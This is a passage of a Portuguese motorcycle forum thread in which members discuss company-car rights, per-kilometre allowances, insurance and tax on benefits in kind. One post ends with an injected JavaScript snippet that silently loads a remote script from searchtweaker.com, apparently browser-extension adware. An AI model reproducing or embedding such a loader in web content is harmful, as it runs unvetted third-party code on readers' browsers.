InícioPortalÚltimas imagensRegistrarEntrarcarro de serviço - algum advogado por aqui? - Página 2 Lojacarro de serviço - algum advogado por aqui? - Página 2 V-deoscarro de serviço - algum advogado por aqui? - Página 2 Fotos
carro de serviço - algum advogado por aqui? - Página 2 Iy07r7

Novas mensagens
Encontrar as minhas mensagens
Tópicos sem resposta
Compartilhe
 

 carro de serviço - algum advogado por aqui?

Ver o tópico anterior Ver o tópico seguinte Ir para baixo 
Ir à página : Anterior  1, 2
AutorMensagem
Parra
CBR 600F4i
Parra

Número de Mensagens : 3205
Idade : 35
Localização : Margem Sul
Mota/Modelo : CBR600RR 03
Data de inscrição : 03/03/2013

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 01:03

Como e que fazias 216€\mes com 600km?
eu faço em media mais de 1000 com via verde rodos dias na ponte e gasto por volta de 150€ com a via verde.

Seguro contra todos ja é uma mordomia apesar de entender o proposito da mesma.

Eu pago 250€\mes pelo carro mas comprei um a gasoleo acima de 20 mil € por 96 meses. Foi um risco que tomei.

Tido isso sao questoes complicadas e atençao que nao estou a dar razao a empresa. Mas percebesse aue o interesse deles e reduzir custos
Ir para o topo Ir para baixo
galvas
CBR 600F
galvas

Número de Mensagens : 1259
Idade : 43
Localização : Fafe
Mota/Modelo : CBR 1000rr
Data de inscrição : 01/10/2008

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 01:20

os 216€ pagos vem dos 36cent pagos ao km.. erradamente as pessoas só fazem contas ao combustível e portagens.. mas qd te pagam ao km estao englobados todos os custos inerentes ao veiculo... valor de combustível, manutenção, pneus, impostos, seguros, desvalorização do próprio veiculo. tudo isto e para ter em conta a quando do calculo de uma viagem.. 

neste caso o aumento de ordenado proposto serve para ajuda na compra da viatura e desvalorização da mesma.... o valor pago ao km serve para as restantes despesas inerentes a sua utilização aquando da sua utilização a cargo da empresa..

para quem realmente utiliza o veiculo para mts km ainda para mais em lisboa o seguro contra todos nao considero uma mordomia mas sim um "seguro" o valor a pagar pelo premio sera um bocado mais elevado e se tudo correr bem para nada servira, mas tendo em conta o custo de uma óptica e de uma grelha, coisa que facilmente se estraga em cidades com muito transito, o valor do premio e recuperado em pouco tempo..
Ir para o topo Ir para baixo
galvas
CBR 600F
galvas

Número de Mensagens : 1259
Idade : 43
Localização : Fafe
Mota/Modelo : CBR 1000rr
Data de inscrição : 01/10/2008

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 02:26

tive aqui a brincar utilizando umas simulações que ja tinha feitas...

no teu caso daria qq coisa como um custo de cerca de 20cent ao km.. ou seja estarias a ganhar ate aos 1000km mensais 16 cent.. no teu caso um lucro de 96€... mais o incremento de ordenado.. este será o valor que tens para gastar na compra de um veiculo.. se optares por um veiculo usado ligeiramente recente e de consumo comedido.. pagas o carro e ainda metes dinheiro ao bolso...
Ir para o topo Ir para baixo
Parra
CBR 600F4i
Parra

Número de Mensagens : 3205
Idade : 35
Localização : Margem Sul
Mota/Modelo : CBR600RR 03
Data de inscrição : 03/03/2013

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 11:04

galvas escreveu:
os 216€ pagos vem dos 36cent pagos ao km.. erradamente as pessoas só fazem contas ao combustível e portagens.. mas qd te pagam ao km estao englobados todos os custos inerentes ao veiculo... valor de combustível, manutenção, pneus, impostos, seguros, desvalorização do próprio veiculo. tudo isto e para ter em conta a quando do calculo de uma viagem.. 

neste caso o aumento de ordenado proposto serve para ajuda na compra da viatura e desvalorização da mesma.... o valor pago ao km serve para as restantes despesas inerentes a sua utilização aquando da sua utilização a cargo da empresa..

para quem realmente utiliza o veiculo para mts km ainda para mais em lisboa o seguro contra todos nao considero uma mordomia mas sim um "seguro" o valor a pagar pelo premio sera um bocado mais elevado e se tudo correr bem para nada servira, mas tendo em conta o custo de uma óptica e de uma grelha, coisa que facilmente se estraga em cidades com muito transito, o valor do premio e recuperado em pouco tempo..
Eu considero uma mordomia. Posso dizer aue so nao tenho pois tem um valor algo  elevado.

Eu apresentei as contas que hasto em combjstivel e via verde para o dobro dos quilometros aqui do amigo. Ou seja, ele apresenta fazer 600km. Seria metade do que gasto, entao o resto dos 216 seriam para todos os outros gastos e descalorizaçao como bem dizes.

Ja agora onde fazes essas simulaçoes? Lol eu sempre aue faço contas a essas coisas tenho de fazer uma data de contas ahah
Ir para o topo Ir para baixo
galvas
CBR 600F
galvas

Número de Mensagens : 1259
Idade : 43
Localização : Fafe
Mota/Modelo : CBR 1000rr
Data de inscrição : 01/10/2008

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 11:10

contas essas que tb fiz..  utilizei software e estudos próprios.. uma vez que estou ligado a área da gestão de frotas...
Ir para o topo Ir para baixo
GFortinho
CBR 400RR
GFortinho

Número de Mensagens : 506
Idade : 39
Localização : Porto
Mota/Modelo : CBR 1000RR TRICOLOR '04
Data de inscrição : 20/08/2010

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 11:46

Ja agora deixo aqui um site que não sei se ja conhecem para fazer as médias e saber o custo por kilometro das viaturas . www.spritmonitor.de
Eu utilizo e coloco lá tudo desde revisões, peças, seguros, impostos e dá-me o valor do custo por km..
Ir para o topo Ir para baixo
https://www.youtube.com/CBRTricolor
RicardoP
CBR 600F2
RicardoP

Número de Mensagens : 1967
Idade : 34
Localização : Portugal
Mota/Modelo : Kawasaki ZZR 1400
Data de inscrição : 05/02/2012

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 11:50

sinceramente 600km's por mês nao é nada, antes fizesses mais para que pudesses ganhar mais, mas mesmo sendo poucos km's nao precisas de grandes contas para saberes que se comprares um carro de 3000€ ou 3500€ em menos de 2 anos está pago... considerando que ficará sempre um valor residual dessa viatura irá compensar bem mais cedo e ainda ficas com carro, mas é um bem corpóreo.

bem feitas as contas, mesmo que sejas despedido ao fim de um ano após teres dado 3500€ por um coche e vendas o carro ao desbarato por 2250€ nao vais perder dinheiro, antes pelo contrário.
Ir para o topo Ir para baixo
bteixeira
CBR 250
bteixeira

Pendura : Lia

Número de Mensagens : 224
Idade : 41
Localização : depende...
Mota/Modelo : Yamaha YZF 600 (Thundercat)
Data de inscrição : 02/02/2010

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 16:01

Bem pessoal, a minha dúvida já foi esclarecida ontem, que era se me podiam retirar o carro sem mais nem menos. Não podem.

Obrigado pelas vossas opiniões pessoais.
Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 61
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitimefevereiro 13th 2014, 16:21

bteixeira escreveu:
Bem pessoal, a minha dúvida já foi esclarecida ontem, que era se me podiam retirar o carro sem mais nem menos. Não podem.

Obrigado pelas vossas opiniões pessoais.
Boas,
Alerto que se fores para tribunal podes correr o risco de ter problemas com o fisco. É que o usufruto do carro pode ser considerado rendimento em espécie sendo passível de tributação em sede de IRS. Tás a ver os anos todos para trás...  affraid 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Ir para o topo Ir para baixo
Conteúdo patrocinado




carro de serviço - algum advogado por aqui? - Página 2 Empty
MensagemAssunto: Re: carro de serviço - algum advogado por aqui? carro de serviço - algum advogado por aqui? - Página 2 Icon_minitime

Ir para o topo Ir para baixo
 

carro de serviço - algum advogado por aqui?

Ver o tópico anterior Ver o tópico seguinte Ir para o topo 
Página 2 de 2Ir à página : Anterior  1, 2

 Tópicos semelhantes

-
» algum madeirense por aqui? precisava de ajuda
» tiro o carro meto o carro.... (mas n é facil)
» O Advogado
» advogado
» GNR Vs Advogado

Permissões neste sub-fórumNão podes responder a tópicos
CBRportugal | Comunidade Motard :: OFF-TOPIC :: Outros assuntos-